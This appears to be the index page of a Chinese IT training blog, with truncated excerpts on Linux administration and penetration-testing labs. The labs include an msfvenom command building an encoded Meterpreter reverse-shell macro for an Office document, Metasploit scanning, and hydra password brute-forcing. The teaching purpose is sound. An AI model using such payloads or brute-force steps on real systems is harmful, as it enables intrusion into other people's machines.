xueshenlaila的博客

VSFTP服务器概述FTP服务概述FTP服务器（File Transfer ProtocolServer）是在互联网上提供文件存储和访问服务的计算机，它们依照FTP协议提供服务。FTP（File Transfer Protocol: 文件传输协议）作用：Internet 上用来传送文件的协议。常见FTP服务器：Windows：Serv-U 、FTP Server、filezilla_serverLinux：ProFTPD:（Professional FTP daemon）一个Unix平台上或

实战:使用DHCP为局域网中的机器分配IP地址首先为了避免和当前网络环境中DHCP冲突，我们使用虚拟机自定义的网络模式：使用VMnet2即可安装DHCP1.使用yum进行安装。[root@xuegod63 ~]# yum -y install dhcp #使用yum安装DHCP。2.配置文件位置：主配置文件：[root@xuegod63 ~]# vim /etc/dhcp/dhcpd.conf## DHCP Server Configuration file.# see /

安装PXC集群软件包PXC实验环境说明系统使用CentOS7.6以上，关闭防火墙，关闭selinux，配好ip，配好网络yum源环境说明如下Node Host IP Addr DescpritionNode1 xuegod63.cn 192.168.1.63/24 集群节点1Node2 xuegod64.cn 192.168.1.64/24 集群节点2Node3 xuegod62.cn 192.168.1.62/24 集群节点3说明Percona XtrDB Cluster 属于

首先将office 2016.zip上传到win7虚拟机上，解压后，安装一下office。┌──(root💀xuegod53)-[~]└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe执行完成后会生成2段代码第一段代码是MACRO CODE [ˈmækrəʊ k

基于SSH协议收集信息查看ssh服务的版本信息msf6 > use auxiliary/scanner/ssh/ssh_versionmsf6 auxiliary(scanner/ssh/ssh_version) > show optionsmsf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180msf6 auxiliary(scanner/ssh/ssh_version) > run对SSH

SMB概述：服务器消息块（Server Message Block，缩写为SMB），又称网络文件共享系统（Common Internet File System，缩写为CIFS），一种应用层网络传输协议，由微软开发，主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。经过Unix服务器厂商重新开发后，它可以用于连接Unix服务器和Windows客户机，执行打印和文件共享等任务。

最内层是硬件，最外层是用户常用的应用，比如说firefox浏览器，evolution查看邮件，一个计算流体模型等等。硬件是物质基础，而应用提供服务。但在两者之间，还要经过一番周折。

CSRF（Cross Site Request Forgery），中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后，诱使用户访问一个攻击页面，利用目标网站对用户的信任，以用户身份在攻击页面对目标网站发起伪造用户操作的请求，达到攻击目的。

对于web应用的渗透测试，大致可分为三个阶段：信息收集、漏洞发现以及漏洞利用。在实践过程中需要进一步明细测试的流程，以下通过9个阶段来描述渗透测试的整个流程：1.明确目标1）确定范围：测试的范围，如：IP、域名、内外网、整站or部分模块2）确定规则：能渗透到什么程度（发现漏洞为止or继续利用漏洞）、时间限制、能否修改上传、能否提权…目标系统介绍、重点保护对象及特性。是否允许数据破坏？是否允许阻断业务正常运行？测试之前是否应当知会相关部门接口人？接入方式？外网和内网？测试是发现问题就算.

许多的Web应用程序一般会有对服务器的文件读取查看的功能，大多会用到提交的参数来指明文件名形如：http://www.nuanyue.com/getfile=image.jgp当服务器处理传送过来的image.jpg文件名后，Web应用程序即会自动添加完整路径，形如“d://site/images/image.jpg”，将读取的内容返回给访问者。初看，在只是文件交互的一种简单的过程，但是由于文件名可以任意更改而服务器支持“~/”，“…/”等特殊符号的目录回溯，从而使攻击者越权访问或者覆盖敏感数据，如网

前言hydra是著名黑客组织thc的一款开源的暴力破解密码工具，功能非常强大，kali下是默认安装的，几乎支持所有协议的在线破解。密码能否破解，在于字典是否强大。本文仅从安全角度去讲解工具的使用，请勿用于非法用途。hydra参数讲解-R #继续从上一次进度接着破解。-S #采用SSL链接。-s #PORT 可通过这个参数指定非默认端口。-l #LOGIN 指定破解的用户，对特定用户破解。-L #FILE 指定用户名字典。-p #PASS 小写，指定密码破解，少用，一般是采用密

命令：curl在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具，可以说是一款很强大的http命令行工具。它支持文件的上传和下载，是综合传输工具，但按传统，习惯称url为下载工具。语法：# curl [option] [url]常见参数：-A/--user-agent <string> 设置用户代理发送给服务器-b/--cookie <name=string/file> cookie字符串或文件读取位置-c/--coo

信息收集靶机的IP地址为：192.168.173.136利用nmap工具扫描其开放端口、系统等整理一下目标系统的相关信息系统版本：Windows server 2003开放的端口及服务：21/tcp ftp135/tcp msrpc139/tcp netbios-ssn445/tcp microsoft-ds777/tcp multiling-http1025/tcp NFS-or-IIS1026/tcp LSA-or-nterm1029/tcp ms

我们前面学习了主动信息收集和被动信息收集，而且还学习了漏洞检测工具NESSUS，接下来给大家讲解使用Metasploit来对目标进行信息收集，这个过程包含了前面所有的方式以及多了一些更加极端的获取信息方式，比如获取服务器的硬件信息，系统用户信息、进程信息等。使用Metasploit中的nmap和arp_sweep 收集主机信息Metasploit中也有NMAP工具┌──(root💀xuegod53)-[~]└─# msfconsolemsf6 > db_nmap -sV 192.168

我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP：192.168.1.180

第二章 Linux基本命令操作本节所讲内容：2.1 Linux终端介绍 Shell提示符 Bash Shell基本语法2.2 基本命令操作2.3 系统时间管理2.4 帮助命令使用2.5 开关机命令及7个启动级别2.6 实战：设置服务器来电后自动开机2.7 实战：设置服务器定时开机2.1 Linux终端介绍、Shell提示符、Bash基本语法2.1.1 登录LINUX终端两种终端仿真器：1、GNOME桌面的GNOME Terminal ； 2、KDE桌面的Konsole Terminal

文章目录docker私有化仓库介绍私有仓库介绍私有镜像仓库有哪些有优点？实验环境规划使用registry搭建docker私有仓库初始化实验环境-安装docker开启包转发功能和修改内核参数配置xuegod64为docker私有仓库服务端配置xuegod63上的docker使用xuegod64上的私有仓库实战-上传本地镜像到私有仓库实战：使用 harbor 搭建Docker私有仓库为harbor签发证书安装harborharbor 图像化界面使用说明在xuegod63上测试使用xuegod64的harbor镜

文章目录MySQL 读写分离的概述读写分离工作原理为什么要读写分离实现读写分离的方式常见的中间件程序什么是 MyCATMyCat 服务安装与配置MyCat 服务启动与启动设置配置 MySQL 主从实战节点宕机后自动切换 Slave 节点MySQL 读写分离的概述MySQL 作为目前世界上使用最广泛的免费数据库，相信所有从事系统运维的工程师都一定接触过。但在实际的生产环境中，由单台 MySQL 作为独立的数据库是完全不能满足实际需求的，无论是在安全性，高可用性以及高并发等各个方面。因此，一般来说都是通

文章目录1 字段修饰符 (约束)1.1 null 和 not null 修饰符1.2 default 设定字段的默认值1.3 auto_increment 字段约束2 清除表中的记录3 索引3.1 普通索引3.2 唯一索引3.3 主键索引3.4 复合索引3.5 全文索引 (FULLTEXT INDEX)3.6 索引设计原则4 外键约束4.1 什么是外键约束4.2 创建外键约束4.3 删除外键5 视图5.1 创建视图5.2 更新或修改视图5.3 删除视图更多技术干货尽在公众号 “学神来啦” 持续为大家

文章目录MHA 简介MHA 简介MHA 的组成MHA 工作原理MHA 故障切换过程部署 MHA 高可用集群mysql-MHA 群环境说明配置所有节点的 ssh 免密码登录安装 mha-node安装 MHA Manager安装 mysql5.7配置 mysql 主从环境配置 MHA 管理用户配置 MHAMHA 配置检查实战-故障转移以及故障恢复实战-故障转移故障恢复后重新加入 mysql 主从集群MHA 简介MHA 简介MHA（Master High Availability）目前在 MySQL 高

文章目录OSI 七层参考模型，TCP/IP 四层参考模型常见网络相关的协议TCP 和 UDP 常用端口号名称IP 地址分类公众号：“学神来啦”OSI 七层参考模型，TCP/IP 四层参考模型OSI 七层模型：OSI（Open System Interconnection）开放系统互连参考模型是国际标准化组织（ISO）制定的一个用于计算机或通信系统间互联的标准体系。TCP/IP 四层模型：TCP/IP 参考模型是计算机网络的祖父 ARPANET 和其后继的因特网使用的参考模型。分层作

文章目录vim 主要模式介绍vim 编辑器的四种操作模式在正常模式下做的操作Visual mode 可视块模式命令行模式 Command-line 操作技巧自定义 vim 使用环境其它编辑器实战：在 Centos6/RHEL6 上恢复 ext4 文件系统下误删除的文件实战：在 ext4 文件系统上恢复被误删除的文件准备测试环境安装 extundelet恢复数据实战：使用 xmanager 等远程连接工具管理 Linuxvim 主要模式介绍vim 命令模式问：vi 和 vim 是

Mariabd安全配置向导1.安装完mariadb-server后，运行mysql_secure_installation去除安全隐患mysql_secure_installation会执行几个设置：为root用户设置密码删除匿名账号取消root用户远程登录删除test库和对test库的访问权限刷新授权表使修改生效[root@xuegod63 ~]# mysql_secure_installation #进入安全配置向导通过这几项的设置能够提高MySQL库的安全。建议生产环境中My.

注：元数据：保存了子目录和子文件的名称 及inode编号的数据，通过元数据，可以找到对应的真实的数据，及真实数据所在的服务器。有点像字典前面的索引或yum源的缓存

文章目录1 持续集成概述和搭建Gitlab平台1.1持续集成概述1.2jenkins和Gitlab概述GitLab概述：1.3GitLab和GitHub的区别1.4 搭建GitLab平台2 配置gitlab邮件服务和对gitlab平台汉化2.1 管理gitlab服务2.2 配置gitlab邮件服务1.开启邮箱的SMTP服务2. 编辑/etc/gitlab/gitlab.rb文件，配置STMP邮件发送服务。前提你的邮件已经开通stmp/pop3收发功能3 通过命令行测试邮件是否发送成功（也可以不测）.

很多 Linux发行版本已经被设计为所谓的“LiveCD”，即可以直接引导为可用 Linux 系统的 CD。与大多数广为应用的发行版本中可以使用的“拯救模式（rescue mode）”引导选项相反，这些 LiveCD 的设计是，当从 CD 引导起来后，提供一整套可以使用的工具，其中有一些是通用的，有一些是高度专用的。David Mertz 介绍了 Linux 市场中这一迅速成长的分支。Linux-通过 liveCD 进入救模式-重装 grub 修复损坏的系统场景：当系统坏了，进不去了，还需要把.

文章目录which-whereis-locate-grep find 命令使用find 命令使用示例 1：希望在 root 目录下查找更改时间在 1 天以内，被修改的文件例 4：把查找到的文件复制到一个指定的目录例 5：xargs 和 find 命令结合 复制文件例 6：查找多个类型文件例 7: 按权限查找：-perm例 8：查找的目录深度：例 9：查找系统中所有属于用户 user1 的文件，并把这个文件，放到/root/findresults 目录下which-whereis-locat.

安装 SSM：[root@xuegod63 ~]# yum -y install system-storage-managerSSM：检查关于可用硬驱和 LVM 卷的信息。显示关于现有磁盘存储设备、存储池、LVM 卷和存储快照的信息。查看磁盘信息列出设备信息root@xuegod63 ~]# ssm list dev------------------------------------------------------------Device Free Used T

1.1 Prometheus和Grafana概述1.1.1 Prometheus概述Prometheus（普罗米修斯）是一套开源的监控&报警&时间序列数据库的组合，起始是由SoundCloud公司开发的。现在最常见的Docker、Mesos、Kubernetes容器管理系统中，通常会搭配Prometheus进行监控。 Prometheus [prəˈmiθju:s] 普罗米修斯Prometheus基本原理是通过HTTP协议周期性抓取被监控组件的状态，这样做的好处是任意组件只要提供.

1. 确保变更可以回滚佛说：“每次创伤都是一次成熟”。这是运维人员的真实写照。从某种意义上讲，运维是一份不断犯错、不断积累经验的工作。以前没有经历的东西，总是不定期的给你痛击。所以请保护好变更的现场，使得变更有回头的机会。2. 小心破坏性的操作什么是破坏性的操作？比如：对 Oracle 而言，有truncate table_name，delete table_name，drop table_name。这些语句执行起来轻松简单也惬意极了，但记住：即便数据可被回滚，其代价也是非常大！对Linux而

Win11，一夜全网曝光！微软计划6月24日晚上23点揭晓所谓下一代Windows系统，可能叫做Windows 11或者Windows+。国内平台昨晚有开发者泄露了微软全新的 Windows 11 英文预览版。由此可证实 Windows 11 确实是官方命名，虽然没什么太大变化。根据微软发布规律，它将于今年晚些时候面向全球用户推广。作为 Windows 太阳谷更新的一部分，全新的 Windows 11 给我们带来了不太一样的界面 UI 升级，但实际上功能性还是经典内容。但是看上去和苹果系统界面基本.

不知道大家有没有发现。如今，曝光某些知名公司信息泄露的事件频率越来越高。与之对应的，网络安全问题也越来越受到重视。从百度指数摘录了两张图给大家分享下可以看到，对网络安全相关的信息和关注度在逐渐走高，特别是近几年的几次大型数据泄露等安全事件引起了不小的舆论轰动。其实排除一些特定框架中的特定安全问题，具有普遍性的安全问题也不少。其中最常见的就属以下几种，我觉得我们每一位程序员应该都要知道如何尽量避免这些常见问题的发生。1.SQL注入2.跨站脚本攻击（XSS）3.跨站请求伪造（CSRF）4.越权

K8s（kubernetes）作为行业的新宠，近期都霸屏了！云原生计算基金会（Cloud Native Computing Foundation）公布了第三次中国云原生调查报告，报告显示49%的受访者在生产中使用容器，72%的受访者在生产中使用Kubernetes（简称K8s），公有云使用率下降至36%，更多的企业选择混合云。Kubernetes作为容器管理工具在企业使用占比越来越高，世界500强企业也都以K8S作为核心技术支撑，大公司都在争夺K8S人才。国内外知名公司都在基于Kubernetes搭建智

文章目录1 什么是 shell?2扩展：编程语言分类1）低级语言：2）高级语言：3什么是 SHELL 脚本？1 什么是 shell?Shell 是一个命令解释器，它在操作系统的最外层，负责直接与用户进行对话，把用户的输入解释给操作系统，并处理各种各样的操作系统的输出结果，输出到屏幕反馈给用户。这种对话方式可以是交互式也可以是非交互式的我们所输入的命令计算机是不识别的，这时就需要一种程序来帮助我们进行翻译，变成计算机能识别的二进制程序，同时又把计算机生成的结果返回给我们。当前终端使用的哪种

文章目录1 RAID 的实现方式2创建 RAID01、创建 raid02、 查看阵列信息3、 对创建的 RAID0 进行文件系统创建并挂载4、 开机自动挂载3 创建 RAID14创建 RAID55创建 RAID106 删除 RAID 所有信息及注意事项1 RAID 的实现方式互动：我们做硬件 RAID，是在装系统前还是之后？答：先做阵列才装系统 ，一般服务器启动时，有显示进入配置 Riad 的提示，比如：按下CTRL+L/H/M 进入配置 raid 界面。硬 RAID：需要 R

文章目录RAID 概念-企业级 RAID-0-1-5-10 的工作原理1.1RAID 几种常见的类型1.2RAID-0 的工作原理1.3RAID-11.4RAID-51.5嵌套 RAID 级别1.6RAID 硬盘失效处理RAID 概念-企业级 RAID-0-1-5-10 的工作原理磁盘阵列（Redundant Arrays of Independent Disks，RAID），有“独立磁盘构成的具有冗余能力的阵列”之意（其中一块盘坏了，数据不丢失）。 磁盘阵列是由很多价格较便宜的磁盘

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录1 Jumpserver 堡垒机概述-部署 Jumpserver 运行环境1.1跳板机概述1.2Jumpserver 实验拓扑图1.3初始化系统环境1.4安装 jumpserver 所需相关服务2 jumpserver 平台系统初始化2.1系统基本设置2.2配置邮件发送服务器3 使用 jumpserver 管理王者荣耀数万台游戏服务器3.1用户管理1、添加用户组。2、添加用户3.2编辑资产树添加节点3.3创建管

文章目录归档和压缩文件示例1：给/boot/grub2 目录 打包示例2：把两个目录或目录+文件打包成一个归档包：例 3：不解包，查看 tar 中的内容：例 4：对比加 v 的效果tar 归档+压缩示例1：创建.tar.gz 包示例2：创建.tar.bz2 包示例3：创建.tar.xz 包归档和压缩文件归档和压缩文件的好处：节约硬盘的资源 ，加快文件传输速率tar 命令 作用：打包、压缩文件这幅图的就是说 123456 这几个文件打包成了一个 a.tar 文件，但是这个 a.ta.

话不多说，本文介绍Linux常规操作：查看端口占用进程，根据PID kill掉相关进程。另外补充：根据程序名查看进程PID。首先，两条命令，lsof命令和netstat命令。方式一：lsof命令1、查看占用端口进程的PID： lsof -i:{端口号}2、根据PID kill掉相关进程：kill -9 {PID}方式二：netstat命令1、查看占用端口进程的PID：netstat -tunlp|grep {port}2、kill方法如上。 kill -9 {PID}.

文章目录导读一、黑客违法判刑标准《刑法》第二百八十五条第二百八十六条二 、网络安全法条规细则三 、网络安全的违法案例导读法律就是秩序，有好的法律才有好的秩序——亚里士多德中国工程院院士李建成教授指出，“网络安全建设，应当以法律为根，技术为基。”《网络安全法》是在吸取国内外立法经验的基础上，经过多次公开征集意见，人大常委会三次审议之后完成的。尽管立法过程历时较短，但其中不乏制度亮点。专用词解释：（一）网络，是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息进行收集、存储、传.